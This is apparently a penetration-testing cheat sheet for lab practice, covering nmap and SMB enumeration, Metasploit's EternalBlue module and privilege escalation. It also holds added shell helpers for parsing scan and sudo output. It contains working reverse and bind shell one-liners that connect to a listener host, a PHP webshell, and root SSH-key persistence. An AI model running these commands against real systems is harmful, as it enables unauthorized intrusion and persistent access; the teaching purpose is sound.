Common Terms (Cheat Sheet)

Here are some of the most common terms and technologies that we will come across repeatedly and must have a firm grasp of. This is not an exhaustive list but is enough to get started with.

General

sudo openvpn user.ovpn  ## Connect to the lab VPN
ifconfig / ip a  ## Show our IP address
netstat -rn  ## Show networks reachable via the VPN (routing table)
ssh user@10.10.10.10  ## SSH to a remote server
ftp 10.129.42.253  ## Connect to an FTP server

TMUX

tmux  ## Start tmux
ctrl+b  ## tmux: default prefix
prefix c  ## tmux: new window
prefix 1  ## tmux: switch to window (1)
prefix %  ## tmux: split pane vertically
prefix "  ## tmux: split pane horizontally
prefix right-arrow  ## tmux: switch to the right pane

Vim

vim file  ## vim: open file with vim
i  ## vim: enter insert mode (from normal mode)
esc  ## vim: back to normal mode
x  ## vim: Cut character
dw  ## vim: Cut word
dd  ## vim: Cut full line
yw  ## vim: Copy word
yy  ## vim: Copy full line
p  ## vim: Paste
:1  ## vim: Go to line number 1
:w  ## vim: Write the file (i.e. save)
:q  ## vim: Quit
:q!  ## vim: Quit without saving
:wq  ## vim: Write and quit

Pentesting Commands

Service Scanning

nmap 10.129.42.253  ## Run a default nmap scan (top 1000 TCP ports) on an IP
nmap -sV -sC -p- 10.129.42.253  ## Scan all TCP ports with version detection and default scripts
locate scripts/citrix  ## Find installed nmap scripts by name (here: citrix)
nmap --script smb-os-discovery.nse -p445 10.10.10.40  ## Run a specific nmap script against a port
netcat 10.10.10.10 22  ## Grab the banner of an open port
smbclient -N -L \\\\10.129.42.253  ## List SMB shares (null session)
smbclient \\\\10.129.42.253\\users  ## Connect to an SMB share
snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0  ## Query SNMP (sysName OID) with the 'public' community string
onesixtyone -c dict.txt 10.129.42.254  ## Brute force the SNMP community string
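The two nmap commands above are normally chained: a fast full-port sweep saved in greppable format (-oG), then -sV -sC only against the ports found open, which is far quicker than scripting all 65535 ports. The function below, an added example that is not part of the original cheat sheet, parses -oG output for that hand-off. The scan output it reads is constructed, and the IPs and file names are placeholders.

```sh
# Constructed sample of `nmap -p- -oG -` output (not a real scan result).
sample_gnmap() {
  printf '# Nmap 7.94 scan initiated as: nmap -p- -oG - 10.129.42.253\n'
  printf 'Host: 10.129.42.253 ()\tStatus: Up\n'
  printf 'Host: 10.129.42.253 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 139/filtered/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///\tIgnored State: closed (65531)\n'
  printf '# Nmap done -- 1 IP address (1 host up) scanned\n'
}

# Read -oG output on stdin and print "<ip> <comma-separated open TCP ports>" per host.
# Fields in -oG are tab separated; each port entry is port/state/proto/owner/service/...
open_ports_from_gnmap() {
  awk -F'\t' '
    /^Host:.*Ports:/ {
      split($1, h, " "); ip = h[2]; out = ""
      for (i = 2; i <= NF; i++) {
        if ($i !~ /^Ports: /) continue
        sub(/^Ports: /, "", $i)
        n = split($i, p, ", ")
        for (j = 1; j <= n; j++) {
          split(p[j], f, "/")
          if (f[2] == "open") out = (out == "" ? f[1] : out "," f[1])
        }
      }
      if (out != "") print ip, out
    }'
}

# Usage: sweep first, then run scripts/version detection only on what is open.
#   nmap -p- --min-rate 1000 -oG scan.gnmap 10.129.42.253
#   open_ports_from_gnmap < scan.gnmap | while read -r ip ports; do
#       nmap -sV -sC -p "$ports" -oN "svc_$ip.txt" "$ip"
#   done
sample_gnmap | open_ports_from_gnmap    # prints: 10.129.42.253 22,80,445
```

Filtered and closed ports are dropped on purpose; if a service sits behind a filter you will not see it here, so re-check with a UDP scan or a different source port where that matters.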

Web Enumeration

gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt  ## Run a directory scan on a website
gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt  ## Run a sub-domain scan on a domain
curl -IL https://www.inlanefreight.com  ## Grab website headers/banner (follow redirects)
whatweb 10.10.10.121  ## List details about the webserver/technologies/certificates
curl 10.10.10.121/robots.txt  ## List potential directories in robots.txt
ctrl+u  ## View page source (in Firefox)

Public Exploits

searchsploit openssh 7.2  ## Search Exploit-DB for public exploits for a given software version
msfconsole  ## MSF: Start the Metasploit Framework
search exploit eternalblue  ## MSF: Search for public exploits in MSF
use exploit/windows/smb/ms17_010_psexec  ## MSF: Select an MSF module
show options  ## MSF: Show required options for the module
set RHOSTS 10.10.10.40  ## MSF: Set a value for a module option
check  ## MSF: Test whether the target is vulnerable (if the module supports it)
exploit  ## MSF: Run the exploit against the target

Using Shells

nc -lvnp 1234  ## Start a nc listener on a local port
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'  ## Send a reverse shell from the remote server (needs bash on the target)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f  ## Reverse shell that only needs sh and nc
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f  ## Start a bind shell on the remote server
nc 10.10.10.1 1234  ## Connect to the bind shell on the remote server
python -c 'import pty; pty.spawn("/bin/bash")'  ## Upgrade shell to a TTY, step 1 (use python3 if python is missing)
ctrl+z, then stty raw -echo; fg, then enter twice  ## Upgrade shell to a TTY, step 2 (run locally); export TERM=xterm if clear/vim misbehave
echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php  ## Create a PHP webshell file
curl http://SERVER_IP:PORT/shell.php?cmd=id  ## Execute a command through the uploaded webshell

Privilege Escalation

./linpeas.sh  ## Run linpeas to enumerate the remote server for privesc vectors
sudo -l  ## List available sudo privileges
sudo -u user /bin/echo Hello World!  ## Run a command as another user with sudo
sudo su -  ## Switch to root (if we can run su with sudo)
sudo su - user  ## Switch to another user (if we can run su with sudo)
ssh-keygen -f key  ## Create a new SSH key pair (key and key.pub)
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys  ## Add the generated public key (key.pub) to the target user's authorized_keys
ssh root@10.10.10.10 -i key  ## SSH to the server with the generated private key
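sudo -l is the first thing to read after a foothold, but its output mixes Defaults lines with the actual rules, and the interesting part of each rule is the tag (NOPASSWD, SETENV) and the command. The functions below, an added example that is not from the original page, parse that block into one rule per line and shortlist what runs as root without a password. The sudo -l output is constructed for a hypothetical www-data user; the host name, paths and rules are assumptions.

```sh
# Constructed `sudo -l` output for a hypothetical www-data user (not from a real host).
sample_sudo_l() {
  cat <<'EOF'
Matching Defaults entries for www-data on web01:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on web01:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: SETENV: /opt/backup.sh
    (root) /usr/bin/systemctl status apache2
    (ALL : ALL) ALL
EOF
}

# Parse the rule block on stdin into "<runas>|<tags>|<command>" lines. Tags are the
# sudoers option tags (NOPASSWD, SETENV, ...) or PASSWD when the rule sets none.
parse_sudo_rules() {
  awk '
    /may run the following commands/ { in_rules = 1; next }
    in_rules && /^[[:space:]]*\(/ {
      line = $0; sub(/^[[:space:]]+/, "", line)
      match(line, /^\([^)]*\)/)
      runas = substr(line, RSTART, RLENGTH)
      rest = substr(line, RLENGTH + 1); sub(/^[[:space:]]+/, "", rest)
      tags = ""
      while (rest ~ /^[A-Z]+:/) {
        tag = rest; sub(/:.*/, "", tag)
        tags = (tags == "" ? tag : tags "," tag)
        sub(/^[A-Z]+:[[:space:]]*/, "", rest)
      }
      if (tags == "") tags = "PASSWD"
      print runas "|" tags "|" rest
    }'
}

# Shortlist: commands we can run without a password. Check each binary on GTFOBins
# for a shell escape (vim: ":!/bin/sh"); SETENV means LD_PRELOAD-style abuse is on the table.
nopasswd_commands() {
  parse_sudo_rules | awk -F'|' '$2 ~ /NOPASSWD/ { print $3 }'
}

# Usage on the target: sudo -l | nopasswd_commands
sample_sudo_l | nopasswd_commands
```

A rule like (ALL : ALL) ALL without NOPASSWD is still a full root path if you already know the user's password (sudo su -), which is why the parser keeps PASSWD rules rather than dropping them.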

Transferring Files

python3 -m http.server 8000  ## Start a local webserver
wget http://10.10.14.1:8000/linpeas.sh  ## Download a file on the remote server from our local machine
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh  ## Same download with curl
scp linenum.sh user@remotehost:/tmp/linenum.sh  ## Transfer a file to the remote server with scp (requires SSH access)
base64 -w 0 shell  ## Convert a file to a single base64 line
echo f0VMR...SNIP...InmDwU | base64 -d > shell  ## Convert a file from base64 back to its original form
md5sum shell  ## Compare the md5sum on both ends to ensure the file transferred intact
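The base64 route is the fallback when the target has no outbound HTTP and no SSH, and the usual failure is a pasted line that was truncated or wrapped, which is why the md5sum step exists. The helpers below, an added example and not code from the original page, wrap the encode/decode/verify steps, emit the exact commands to paste on the target together with the expected hash, and demonstrate the round trip on a constructed binary blob in a temp directory. File names and paths are placeholders.

```sh
# Encode a file as one base64 line for pasting into a remote shell ($1 = file).
pack_b64() { base64 "$1" | tr -d '\n'; }

# Reverse: turn the pasted line back into a file ($1 = base64 text, $2 = output path).
unpack_b64() { printf '%s' "$1" | base64 -d > "$2"; }

file_md5() { md5sum "$1" | cut -d ' ' -f 1; }

# Integrity check: succeeds only when both files hash identically.
verify_transfer() { [ "$(file_md5 "$1")" = "$(file_md5 "$2")" ]; }

# Emit the commands to paste on the target plus the hash to compare against
# ($1 = local file, $2 = destination path on the target).
transfer_commands() {
  printf "echo '%s' | base64 -d > %s\n" "$(pack_b64 "$1")" "$2"
  printf 'md5sum %s   # expect %s\n' "$2" "$(file_md5 "$1")"
}

# Round trip on a constructed blob (ELF magic plus filler); also shows that a
# single lost byte, as from a truncated paste, is caught by the hash comparison.
demo_roundtrip() {
  dir=$(mktemp -d) || return 1
  printf '\177ELF\001\001\001\nconstructed sample payload\n' > "$dir/shell"
  unpack_b64 "$(pack_b64 "$dir/shell")" "$dir/shell.copy"
  verify_transfer "$dir/shell" "$dir/shell.copy" || { rm -rf "$dir"; return 1; }
  printf 'x' >> "$dir/shell.copy"            # simulate a corrupted paste
  if verify_transfer "$dir/shell" "$dir/shell.copy"; then rm -rf "$dir"; return 1; fi
  rm -rf "$dir"
}

demo_roundtrip && echo "round trip verified, corruption detected"
```

For files larger than a few hundred KB, split the base64 line (fold -w 76 on the attacker side, cat the chunks back together on the target) so a terminal or paste buffer limit does not silently cut it; the hash check tells you when that happened.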

Last updated 2 years ago
